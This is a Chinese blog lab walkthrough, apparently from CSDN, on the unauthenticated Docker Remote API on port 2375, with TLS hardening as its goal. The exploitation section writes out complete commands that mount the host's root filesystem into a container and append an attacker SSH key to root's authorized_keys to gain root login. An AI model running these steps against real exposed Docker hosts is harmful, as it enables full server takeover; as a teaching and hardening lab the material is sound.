Docker Remote API未授权访问漏洞以及安全防护

已于 2023-07-26 12:41:22 修改
阅读量496 收藏 1
点赞数
分类专栏: 安全加固 文章标签: docker 安全 容器
于 2023-07-26 11:32:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46487664/article/details/131935534
版权

一、拓扑图

二、环境与配置

环境

设备

IP地址

操作类型

docker版本

镜像

训练机

192.168.0.2

centos7

18.03.1-ce

*

靶机

192.168.0.3

Ubuntu

24.0.4

至少一个容器镜像

靶机配置

执行vi /usr/lib/systemd/system/docker.service命令对靶机docker服务进行配置

执行 ExecStart=/usr/bin/dockerd -H unix:///var/run/docker.sock -H tcp://192.168.0.3:2375命令编辑docker.service文件,开启 Docker daemon 的远程访问,也就允许Docker daemon 进行本地和远程通信

三、背景

在使用Docker Swarm中,管理Docker的节点默认会启动一个API服务,并且将2375作为默认端口,0.0.0.0绑定为默认可以访问到API的IP。因为API是可以执行Docker命令的,所以暴露在公网上就非常危险。如果目标是以root权限运行的Docker,那么就可以利用Docker能挂载宿主机的物理路径到容器中来写入ssh公钥来获取shell。

四、API测试

4.1执行docker -H tcp://192.168.0.3:2375 version命令查看靶机docker版本

4.2执行docker -H tcp://192.168.0.3:2375 images命令查看靶机docker下容器镜像

五、漏洞利用

5.1执行docker -H tcp://192.168.0.3:2375 run -it -v /:/mnt ubuntu /bin/bash命令将靶机的/路径挂载到容器的/mnt路径下

5.2新建一个训练机的终端,执行ssh-keygen -t rsa命令生成秘钥对

5.3执行cat /root/.ssh/id_rsa.pub查看公钥内容

5.4将公钥内容复制到文本编辑器中,然后将换行符删掉,将内容变成一行

然后切换到训练机进入容器Ubuntu的终端,在容器中输入echo "删除换行符后的内容" >>/mnt/root/.ssh/authorized_keys,命令如下:

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFPFe9B7fHccehER3gLBPWr6xEM771AH2IO8P6DYK4u/RCes/E6o4Q7jAt+nLCrN8t3jJrCM6A626mr0h TuKYVGO6kxWs9lCJC8TlGv2B69fJVx7vX/HrwaBHQkPoyMq3GM7BoiFGiSJUu29qaTv/zZmxn7252yflQXeXoIqxQVWgX8OQDKlXQk6F+mvvLJNZSUUVMb4FOjfViChAJ8JBOaUbK5xQbpsDjiCQX Ike7X0pHHSb5PcOLs0ZuY059NqCrboiwCglrYsevlTWLEe4FNNfyjDxsAIxW40SU7p1hl/Hd42TQdDPpw9wfmYzxMq8cwG/hadzR6dSea5bKRetB root@Server-e76b1696-2869-4f19-97dd- b5c56e217cc9.novalocal" >>/mnt/root/.ssh/authorized_keys

5.5再次切换到训练机终端,执行ssh root@192.168.0.3命令进行秘钥认证登录

六、加固

6.1采取TLS技术进行加密认证和身份验证,执行vi /usr/lib/systemed/system/docker.service命令修改配置文件,取消14行注释,并给16行添加注释。

6.2执行systemct daemon-reload和systemctl restart docker.service命令重启docker服务

七、验证

7.1训练机终端执行docker -H tcp://192.168.0.3:2376 run -it -v /:mnt ubuntu /bin/bash命令,发现无法进入靶机Ubuntu容器内

7.2执行 docker --tlsverify --tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/client-cert.pem --tlskey=/etc/docker/client-key.pem -H tcp://master:2376 run -it -v /:/mnt ubuntu /bin/bash命令,

使用证书再次进行验证,发现成功进入靶机Ubuntu容器内

注意:tcp://master采用了本地主机名解析技术,也就是将IP地址192.168.0.3和主机名master的映射关系写入到了训练机/etc/hosts文件中了。

网安小Q
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Docker Remote API 授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
Docker授权访问漏洞详解
最新发布
m0_64481831的博客
06-11 1098
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器
授权访问Docker授权访问漏洞
qq_68163788的博客
05-14 1770
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
Docker API 授权访问漏洞
qq_42383069的博客
05-09 7734
Docker API 授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
Docker授权访问漏洞
Kevin's Blog
08-03 8108
文章目录一、漏洞介绍1.1 漏洞成因1.2 漏洞概况二、攻击过程2.1 信息收集2.2 漏洞探测2.3 漏洞利用三、防御方法 一、漏洞介绍 1.1 漏洞成因   又叫Docker Remote API授权访问漏洞,此API主要目的是取代命令行界面;Dcoker swarm是docker下的分布化应用的本地集群,开放2375监听容器时,会调用这个API,方便的docker集群管理和扩展(绑定在0.0.0.0上,http会返回404page not fount) 1.2 漏洞概况 fofa搜索全国端口占有概况
容器镜像仓库泄露风险分析
renhongxia1的博客
11-13 83
公众号转载的文章及图片出于非商业性的教育和科研目的供大家参考和探讨,并不意味着支持其观点或证实其内容的真实性。图19 具有认证机制的Docker Registry将可以对私有镜像仓库进行保护。图10 通过镜像的digest组装出镜像拉取命令,并成功拉取该镜像。图9 通过Harbor的API接口进一步获取该镜像的digest。图8 通过CVE-2022-46463发现了上传的镜像仓库名称。图15 通过API对资产的镜像仓库列表进行读取。图16 通过API获取镜像仓库的tag列表。
Docker API授权漏洞复现
crowsec
01-27 4059
如果在docker上配置了远程访问docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制的话,攻击者就可以通过Docker授权来控制服务器 扫取二维码获取更多信息! 微信公众号:乌鸦安全 扫取二维码获取更多信息!
漏洞——Docker远程api授权访问(原理扫描)
龍承leo
10-24 826
Docker远程api授权访问(原理扫描)
【备忘录】修复docker环境下的nacos安全漏洞:身份认证绕过漏洞
Xcong_Zhu的博客
10-23 2253
在nacos2.2.0.1和1.4.5版本之前的版本中,可能是为了便于开发环境使用,默认开启了一个自带的token默认值,导致上述报告中,可以利用默认的访问秘钥跳过认证,直接登陆。1、检查application.properties文件中token.secret.key属性,若为默认值,可参考:https://nacos.io/zh-cn/docs/v2/guide/user/auth.html进行更改。之后讲登录返回包修改为正确登录信息。点击发送发现正确登录返回信息。同时选中base64加密。
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
1. 离线安装docker; 2. 实现docker-cert配置,修复docker remote API漏洞;.zip
04-30
docker安装 docker安装方法有多种,下面列举在Windows和Linux系统中的安装步骤:12 ...可以通过访问Docker官网的CentOS下载地址获取帮助文档,按步骤进行安装。 安装Docker CE(Community Edition)
Docker暴露2375端口,引起安全漏洞
02-26
今天有小伙伴发现docker暴露出2375端口,引起了安全漏洞。我现在给大家介绍整个事情的来龙去脉,并告诉小伙伴们,怎么修复这个漏洞。为了实现集群管理,Docker提供了远程管理接口。DockerDaemon作为守护进程,运行在...
Docker 授权访问漏洞
Thunderclap的博客
07-13 2017
Docker 授权访问漏洞
安全攻防(八)之 Docker Remote API 授权访问逃逸
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-09 1890
Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,其默认绑定2375端口,如管理员对其配置不当可导致授权访问漏洞。攻击者利用 docker client 或者 http 直接请求就可以访问这个 API,可导致敏感信息泄露,甚至可进一步利用Docker自身特性,借助容器逃逸,最终完全控制宿主服务器Docker daemon 是 Docker 引擎的后台进程,也称为 Dockerd。
配置开启Docker2375远程连接与解决Docker授权访问漏洞
Sherry
11-13 4772
配置开启Docker2375远程连接与解决Docker授权访问漏洞
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 Docker Registry 的权限、加强密码强度,并且定期更新 Docker Registry 的软件等方式来保障安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值